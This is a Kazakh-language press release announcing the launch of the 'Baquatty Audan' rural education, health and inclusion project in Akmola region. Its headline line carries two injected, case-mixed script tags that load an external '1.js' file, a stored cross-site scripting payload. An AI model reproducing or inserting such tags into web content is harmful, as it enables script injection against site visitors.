Жеке ANSA және ESEN қорлары Ақмола облысы әкімдігінің қолдауымен, «AMANAT» партиясының бастамасымен, Целиноград ауданында «Baquatty Audan» әлеуметтік жобасын іске қосады<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
Жеке ANSA және ESEN қорлары Ақмола облысы әкімдігінің қолдауымен, «AMANAT» партиясының бастамасымен, Целиноград ауданында «Baquatty Audan» әлеуметтік жобасын іске қосады
2024 жылғы 13 қарашада сағат 15:00-де Ақмола облысы, Целиноград ауданы, Қараөткел ауылында «Baquatty Audan» бастамасының ресми ашылуы өтеді. Бұл жоба Қазақстанның ауылдық аймақтарында білім беру, денсаулық сақтау және инклюзия мүмкіндіктерін жақсартуға бағытталған.
Іс-шараға «AMANAT» партиясының хатшысы Ш. Каринова, ҚР Мәжіліс депутаттары, Ақмола облыстық білім беру басқармасының басшысы А. Балташева, ANSA және ESEN жеке қорларының өкілдері, сондай-ақ жобаның серіктестері – НЗМ, ОМЦ, НАО, Оқушылар сарайы, BINOM, мектеп директорлары мен мұғалімдер қатысады.
«Baquatty Audan» жобасы Қазақстан Президенті Қасым-Жомарт Тоқаевтың әлеуметтік инфрақұрылымды нығайту және қала мен ауыл арасындағы қызметтерге қолжетімділікті теңестіру жөніндегі тапсырмаларын іске асыруды көздейді.
Жобаның басты бағыттары:
- Білім беру: 1000-нан астам педагогтің біліктілігін арттыру курстарын ұйымдастыру, «Ауыл педагогика академиясын» ашу және 2026 жылға қарай 20 000 оқушыны қамтуды мақсат ететін қосымша білім беру бағдарламасын іске қосу.
- Денсаулық сақтау: Жоба аясында медицина қызметкерлерін оқыту және 52 000-нан астам тұрғынға медициналық қызмет көрсету үшін жеті ауылда мобильді медициналық орталықтар ашылады.
- Инклюзия: Ерекше қажеттіліктері бар балаларға арналған инклюзивті кабинеттер құрылады, сондай-ақ инклюзивті білім беру мамандары даярланады.
Қараөткелдегі IT мектеп-лицейінде өтетін ресми ашылу салтанатында жобалар таныстырылады, қатысушылар сөз сөйлейді, сондай-ақ біліктілігін арттыру курстарын аяқтаған педагогтарға сертификаттар тапсырылады.
Анықтама үшін: «Baquatty Audan» жобасы пилоттық бастама ретінде іске қосылып, кейін Қазақстанның басқа аймақтарына кеңейтілетін болады.
Мекенжай: Қараөткел ауылы, IT мектеп-лицейі, Кенесары хан көшесі, 2Д.
Аккредитация үшін байланыс нөмірі: 8 702 521 55 82, Меруерт